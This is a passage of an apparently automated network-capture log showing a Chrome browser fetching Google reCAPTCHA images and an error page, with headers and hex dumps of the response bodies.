                                                                                                                          Data Ascii: bCJrNKAzXViRf32OGzybG7O-Bo_tTUlGI1c1jGU2z-qsLkDPQIcwJLSLjUbdnfswHvM9dRN3NRMkQp6iISPnJS5AqBQgC2nqJsUor-dVhEbTaVgEIp6nJ1NleS0LQQwE-AzHioKxAAZtAWd75J8zaRhaowf90FyIxqpFTaVWyCHQNtNNWiejnqTORkkSzUmm-1rICjveemaOmZjdcFXGmqV1Pbejb4ql_WVoeFIjqfTKm0IB-N_hn2TdyaAEn2S
                                                                                                                          2024-12-19 16:08:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          23192.168.2.1649762172.217.19.2284437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:33 UTC1168OUTGET /recaptcha/api2/payload?p=06AFcWeA4zoaFDNqO6EzovS0z4d28jooK4dChq1FVzINjqws77O5XliAiRm6JwAXJIelvyPaGA7eyHEScZ9B-2Dt4fZCirlp1hgSqfhqjExzgZHyhA1pkWUqTxGRIt7UmGqcBJiJ7SX6HXfXTtlRXPSEBLBuGHTqFUCB0V5kKhRcw4srZx1LAMU3_TJaeV0lty1k1XFUaro2-L&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE&id=cbb98b901b4c82b5 HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
                                                                                                                          2024-12-19 16:08:33 UTC681INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Expires: Thu, 19 Dec 2024 16:08:33 GMT
                                                                                                                          Date: Thu, 19 Dec 2024 16:08:33 GMT
                                                                                                                          Cache-Control: private, max-age=30
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Connection: close
                                                                                                                          2024-12-19 16:08:33 UTC709INData Raw: 31 37 35 64 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 64 00 64 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                                                                                                          Data Ascii: 175dJFIFC!"$"$Cdd"}!1AQa"q
                                                                                                                          2024-12-19 16:08:33 UTC1390INData Raw: 00 36 3a 16 5e 46 d2 46 09 24 75 e8 3a 57 22 a1 09 5a 56 fe bf af eb 73 b3 9d f2 db 97 4f eb fa f2 b1 ad 0d cd d7 99 24 73 bb 4e 24 89 62 4f 32 12 e5 90 e1 80 65 6e bd 0f af 41 93 ce 6a 34 d4 fe c9 1c 77 76 fa 74 51 ce 25 cc 72 05 c6 d4 fe eb 10 7e 43 87 3c ff 00 b5 f5 ac d9 7c ef 2a 55 96 19 76 b3 1c c9 b7 63 96 3c e3 3c 1f e2 38 18 ec 73 9e d6 fe dc 96 93 dc 4b 3c 63 60 22 39 0b 29 1b 30 b8 5e 01 04 1c 74 e7 f2 c1 04 8d 07 cc ac f4 fe bb 7c bf a6 38 ce 2b dd b7 6f 9d ad fd 7f c1 65 fd 46 71 ae b2 4b a8 4f 79 3c a3 e4 59 19 b8 8d 53 0d b5 98 e4 8f 98 b7 3c 1c 13 f8 39 34 bb 79 98 fd 9e fa ce 69 73 9f de 06 56 7c 63 68 07 20 8f 4c 1c 7a f7 aa e9 f6 29 96 44 f2 24 9e 60 bb 63 90 47 90 d2 63 ef 1d d8 e0 60 0c 64 fa 77 a9 cd a9 21 60 b3 b9 2d fb b6 40 80 64
                                                                                                                          Data Ascii: 6:^FF$u:W"ZVsO$sN$bO2enAj4wvtQ%r~C<|*Uvc<<8sK<c`"9)0^t|8+oeFqKOy<YS<94yisV|ch Lz)D$`cGc`dw!`-@d
                                                                                                                          2024-12-19 16:08:33 UTC1390INData Raw: bf ad 1f fc 39 6e 74 dc ad 14 d7 f4 fd 7d 3e 6c 91 75 8d 4a 4d cf 33 11 23 31 2d b2 da 46 5c 93 93 82 18 7f 2a 2a dc 57 97 89 1a 8b 56 8d 81 19 62 4b fd ef c0 7a 63 f9 d1 5c ee 8d 6b eb f9 a2 b9 9b f8 6a b4 bf af 33 99 86 e1 76 c8 97 0f 01 83 85 96 48 89 e9 c1 e7 b9 f6 1d 32 0e 7a d3 6d c4 91 4f 25 cb 32 00 59 00 54 1f 3a 12 a0 60 82 47 6d ac 7a 1c f1 81 52 42 c4 cb 6c f0 a1 4c 4a 16 4c 21 1f 2b 63 78 c8 24 7f 0f 5e 3a 1f a1 8e d9 d8 82 b0 ac f6 cd 26 15 b7 64 ed 4d e7 82 38 da 78 6e 48 c8 c7 bd 77 a9 75 fe b5 fe bf ae b8 cd 5d 6b af cb bd b7 fe bb 7c d6 39 4e e4 5b a3 11 8e 01 ba 62 d6 de 61 1b 70 bd 33 c8 39 20 1e 7a f7 ec dd 36 35 64 57 9e 13 3d c3 06 fe 21 9c 6e f4 3e 84 93 9c 12 36 f2 3b d0 d2 3d c8 92 59 f6 f9 6d 9c 3c 68 24 e8 83 2d f5 f9 c1 c6 49
                                                                                                                          Data Ascii: 9nt}>luJM3#1-F\**WVbKzc\kj3vH2zmO%2YT:`GmzRBlLJL!+cx$^:&dM8xnHwu]k|9N[bap39 z65dW=!n>6;=Ym<h$-I
                                                                                                                          2024-12-19 16:08:33 UTC1390INData Raw: 04 f1 59 8d e0 db c9 a3 90 78 53 55 87 5b 55 07 cc da fb 6e 40 ea 15 a2 cf 23 93 dc 9c 8e 2b b8 4f 0b 6a fa 0c 6e 3c 3d ac 49 1d be fd cd 65 a9 27 98 85 49 ce 14 8c f7 e3 a2 82 31 f8 f3 9a 87 f6 11 9c 2e b7 a3 ea 1e 0e d4 98 00 97 56 e0 b4 23 19 3b be a0 ff 00 77 8a 6d 26 b9 5e bf 97 f5 6e 85 ae e9 7f 5f d7 fc 16 72 a2 ee f2 c2 e9 ed 6f 2c 6e 20 91 df f7 f1 48 9b 1b 19 39 76 53 f2 9e e0 71 d8 f7 e8 f7 fe cc bd 95 1d 84 61 99 89 2d b8 40 46 d3 cf 1b 59 4f 20 f0 00 fe 75 df dc 1f 14 7d 84 c5 3d b6 91 e3 ad 27 20 a4 c8 c0 c8 14 83 96 dd d4 1e a7 8d c4 56 3c 5a 0f 85 f5 f9 1e db 47 bb 9f 41 d5 06 08 d3 ef e2 ce f6 c1 25 43 9f 98 7d e3 9c e4 9e c2 b9 a5 46 37 ba d3 e7 d3 fa 68 d1 4e 49 5e eb 4e fb 7f 9f e0 b6 38 fb fd 06 cd 67 0d 26 b3 7e 37 a8 2a 23 b3 c0 0a
                                                                                                                          Data Ascii: YxSU[Un@#+Ojn<=Ie'I1.V#;wm&^n_ro,n H9vSqa-@FYO u}=' V<ZGA%C}F7hNI^N8g&~7*#
                                                                                                                          2024-12-19 16:08:33 UTC1110INData Raw: 5d 92 e2 34 b5 b7 b7 4d d2 17 7f ba d2 03 db a7 1f 36 33 bb 38 e3 f2 f4 ef 86 1f 12 56 48 a0 d1 bc 4b 73 24 0c 02 0b 79 e4 e4 63 a0 2e 79 c6 77 36 0e 31 cf 38 eb 56 fe 20 7c 36 b6 d4 a6 6d 47 c3 d0 0b 6b a9 c1 77 b6 8d 84 69 31 0a 39 0c 72 03 67 1d b0 49 1d 3a 85 28 a9 3b 4b fa b6 bf e6 fd 3f 1b 4a 32 d5 bd ba ed a7 6f bb d7 6b 5d 1e 42 9b 3e ca 03 ac 71 04 00 f2 46 10 1f b8 a4 e0 90 73 eb fc b1 5e 93 f0 fb e2 5b 5b 24 7a 46 b5 24 f7 76 88 3e 4b ae be 5e 7b 1c 0c ed eb cf 51 ce 09 02 bc d2 f2 2b 8b 5b e3 0d c4 52 5b 4e 25 fb 92 47 b5 8f 39 ce de 9d ca f2 7f 9f 08 51 ae 22 8e 1b 7e b1 fc 8e 23 c0 de c4 10 46 07 3b 72 c7 9e c0 1c 51 66 f7 fe bf 0f 97 fc 31 33 77 57 97 f5 f7 f9 a7 f2 fb cf a5 75 d3 61 a8 e9 b1 dc 4d 60 75 7b 29 07 9e 3c 84 59 1d c1 c8 24 6d
                                                                                                                          Data Ascii: ]4M638VHKs$yc.yw618V |6mGkwi19rgI:(;K?J2ok]B>qFs^[[$zF$v>K^{Q+[R[N%G9Q"~#F;rQf13wWuaM`u{)<Y$m
                                                                                                                          2024-12-19 16:08:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          24192.168.2.1649760172.217.19.2284437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:33 UTC612OUTGET /recaptcha/api2/replaceimage?k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
                                                                                                                          2024-12-19 16:08:33 UTC743INHTTP/1.1 405 Method Not Allowed
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                          Pragma: no-cache
                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                          Date: Thu, 19 Dec 2024 16:08:33 GMT
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Allow: POST
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2024-12-19 16:08:33 UTC647INData Raw: 36 38 30 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f
                                                                                                                          Data Ascii: 680<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 405 (Bad Request)!!1</title><style>*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{backgro
                                                                                                                          2024-12-19 16:08:33 UTC1024INData Raw: 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                                          Data Ascii: body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background
                                                                                                                          2024-12-19 16:08:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          25192.168.2.1649764172.217.19.2284437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:35 UTC1168OUTGET /recaptcha/api2/payload?p=06AFcWeA7FMEkEn3AsWDGstm5iD-gQyEvUqp0J___l-WGFyY0VXkDveTeNkvyu6jh75ui6OGd0VXh6MwnUXut8I0Rgbf4I0qHOG5EnlD5L3GT_T6b7PsVKiYN3CqXDjyZJkAW3d-Q7IZ5oIAJrq3C1DHUCmtIDFSvEUp7I_zC6sOKjpcxK7WTsgZ6uaFatqn7MORfxornuDTxQ&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE&id=61c71c20d51b4542 HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
                                                                                                                          2024-12-19 16:08:36 UTC681INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Expires: Thu, 19 Dec 2024 16:08:36 GMT
                                                                                                                          Date: Thu, 19 Dec 2024 16:08:36 GMT
                                                                                                                          Cache-Control: private, max-age=30
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Connection: close
                                                                                                                          2024-12-19 16:08:36 UTC709INData Raw: 31 37 31 35 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 64 00 64 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                                                                                                          Data Ascii: 1715JFIFC!"$"$Cdd"}!1AQa"q
                                                                                                                          2024-12-19 16:08:36 UTC1390INData Raw: 04 30 24 fc c7 3d 46 3d f3 50 c3 a8 f8 71 f5 29 be d3 7d 0c 91 c5 14 d8 78 94 86 50 ed 80 9b 49 18 00 60 93 cf 6a 25 17 53 de 8e 96 ef 7f f8 1e 7e 76 66 91 8a e5 d7 cf a3 7e 5f a7 7f b8 cf 55 b6 7b 8b 84 82 dd 76 29 92 30 c1 55 95 8b ca 32 4e ee 41 38 c6 41 e3 15 ca 1b 64 12 40 c2 de 73 29 78 d2 54 8c f2 00 c8 c7 4f 50 ad 9f 71 cf a7 69 7f 3f 85 ae 6c 27 5b 2b 99 e3 98 34 6d b8 42 1f 60 cb 65 b0 0f 38 c9 1f 9d 71 ba ac 56 e7 54 99 23 ba f3 a2 77 44 0c b6 ff 00 29 ca 13 c1 cf 38 fa e3 d7 af 1c d2 d5 bf 2f 9b fe b5 b9 8c e3 cb 2b 45 5a cb 5d ef d3 f1 7b ff 00 c0 2f cf 3c b6 f9 9b 31 ac 4a 49 4f 9d 81 7e 0f 2b 8c 67 f8 b9 19 f5 cf 35 6b c2 da 94 29 77 78 1d d4 a9 50 a6 08 43 10 38 23 71 62 4e d2 7f 1c 7a 9e 2a 82 5d 69 b6 91 f9 2d 6b 23 5c 02 3c c9 25 52 5b
                                                                                                                          Data Ascii: 0$=F=Pq)}xPI`j%S~vf~_U{v)0U2NA8Ad@s)xTOPqi?l'[+4mB`e8qVT#wD)8/+EZ]{/<1JIO~+g5k)wxPC8#qbNz*]i-k#\<%R[
                                                                                                                          2024-12-19 16:08:36 UTC1390INData Raw: 27 8f c4 67 8a e7 9e 2a 69 28 5d eb fd 7f 57 65 42 d6 b2 5f d7 cf 4f 3d 74 b5 fd 4f 27 96 58 63 b5 93 ed 12 c5 6f 29 8d be d6 aa b2 38 6c fd d3 9c 74 c9 db cf 7a 84 5d c5 14 52 ab ea cf 2b 72 d2 1f 29 8e 43 1c fc bd 81 1c 73 c7 51 de bd 86 37 b7 ba 86 57 f2 ed e5 2f 84 60 b8 07 72 80 77 01 8e 4f 43 8e b9 fa 9a a7 79 6b a6 4d 2c 9b 2d 6d 15 93 8f 2d 40 05 cb 61 89 dc 46 50 0c 67 00 7a fa 60 43 c5 45 dd 54 5a fe 5b 7e 1f f0 3b 11 bb b4 d5 da f5 e9 6f f3 fe ac 79 bc 71 e9 77 05 fc f5 8e e1 a3 72 80 fe f0 ed 03 9c 70 be ff 00 ad 15 dd c9 a1 68 db 62 44 91 20 54 8d 40 0b 99 01 ef 9c 81 8e ff 00 e7 34 53 53 a3 2d 79 9a ff 00 c0 bf 47 63 1f 61 19 fb c9 b5 ff 00 81 7e 8c ce d1 bc 43 a3 27 81 ac f4 c3 3c 62 e9 55 d3 26 12 1c 92 e1 c6 49 c7 04 83 d4 e3 91 51 5c 7c
                                                                                                                          Data Ascii: 'g*i(]WeB_O=tO'Xco)8ltz]R+r)CsQ7W/`rwOCykM,-m-@aFPgz`CETZ[~;oyqwrphbD T@4SS-yGca~C'<bU&IQ\|
                                                                                                                          2024-12-19 16:08:36 UTC1390INData Raw: a5 67 ab 7c 3f b0 d9 2c 9a 66 a1 7d 34 58 ca a3 61 50 80 30 06 48 eb c6 46 0f 4c 60 e6 b2 6a da 5b 4f eb f3 08 b5 a3 f9 79 99 77 5e 37 f1 54 f3 61 2e 23 19 70 d0 ed 89 53 8d a4 85 1c 12 0e 0f 5e f9 fa 56 58 d5 7c 47 a8 09 0b ea 17 d2 a0 21 56 30 5d b0 39 c0 cf 38 00 fa 71 c5 74 37 1e 32 d2 6d 99 12 c3 c2 f1 c6 ea c5 51 a5 f9 db 3c e7 b7 20 e4 f4 27 f5 ac b3 e3 5d 4d 44 12 47 0d bc 78 c6 f6 58 89 60 d9 e3 21 b3 8c f7 1d f3 54 a5 cc 9c a4 fb 7f 5f d7 50 6d 34 ec 8b fa 64 37 96 7b e5 bb b4 91 20 97 84 dd 1f dc 19 19 01 87 cb 81 c7 61 d7 34 dd 2e 38 6c d6 e5 e2 91 c6 d1 32 85 94 05 71 86 00 9e 01 0c 78 ea 00 e8 0f 1c 56 44 da c7 88 2f 7c d4 92 e6 59 4e e1 b6 32 c1 07 07 6a 90 00 03 23 07 db 1f 5a d5 8e 09 8d 84 c8 64 95 54 a4 a7 cc e4 15 5d ca d9 24 67 07 8e
                                                                                                                          Data Ascii: g|?,f}4XaP0HFL`j[Oyw^7Ta.#pS^VX|G!V0]98qt72mQ< ']MDGxX`!T_Pm4d7{ a4.8l2qxVD/|YN2j#ZdT]$g
                                                                                                                          2024-12-19 16:08:36 UTC1038INData Raw: cb 9c 85 03 8e fd f8 1d 4d 65 cb 6d a4 43 6b 71 35 c9 4b 97 43 99 59 3c c9 0e 33 cb 2f 38 1d 4f 7a da 99 a6 99 0d 8c 70 ce f7 12 43 b9 41 c1 ca 7d d5 3f 4e 08 e0 7a 1e bc 54 0b 14 ab 19 22 14 55 27 74 87 ca 2c a5 73 c8 3c 7a 71 ce 3a 1f a5 3a 73 95 3d 52 fd 3e 7f e4 6b 1a 72 8c 9b 9f 5d 7f e1 ff 00 e0 1c 95 9e b3 06 9b 70 05 b4 49 32 6e 1b 89 56 55 24 64 83 dc 83 d8 64 81 cf 7a bb 37 8a 75 2b 40 aa ac 8c f2 b8 12 15 18 ca 26 70 33 93 b5 b0 07 6c d6 8d af 87 ec 2f 27 9c dc 5f 0b 62 80 3a 82 85 c4 84 e0 60 60 74 c7 6c 11 92 b5 b3 1f 82 34 5b 30 63 9e 45 bc c0 d8 c1 e4 27 d7 2a 70 30 58 64 80 07 5e 3f 1f 42 35 a3 38 fb ab b7 ab 29 46 fe f2 fe 95 fa bf cb b9 c2 7f 6b ea 77 5e 44 70 dd ca 03 2a ba ee 70 ab ce ec 02 06 32 0f cd db 38 f6 15 56 de c3 52 ba d4 37
                                                                                                                          Data Ascii: MemCkq5KCY<3/8OzpCA}?NzT"U't,s<zq::s=R>kr]pI2nVU$ddz7u+@&p3l/'_b:``tl4[0cE'*p0Xd^?B58)Fkw^Dp*p28VR7
                                                                                                                          2024-12-19 16:08:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          26192.168.2.1649765172.217.19.2284437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:35 UTC836OUTGET /recaptcha/api2/payload?p=06AFcWeA4zoaFDNqO6EzovS0z4d28jooK4dChq1FVzINjqws77O5XliAiRm6JwAXJIelvyPaGA7eyHEScZ9B-2Dt4fZCirlp1hgSqfhqjExzgZHyhA1pkWUqTxGRIt7UmGqcBJiJ7SX6HXfXTtlRXPSEBLBuGHTqFUCB0V5kKhRcw4srZx1LAMU3_TJaeV0lty1k1XFUaro2-L&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE&id=cbb98b901b4c82b5 HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
                                                                                                                          2024-12-19 16:08:36 UTC681INHTTP/1.1 200 OK
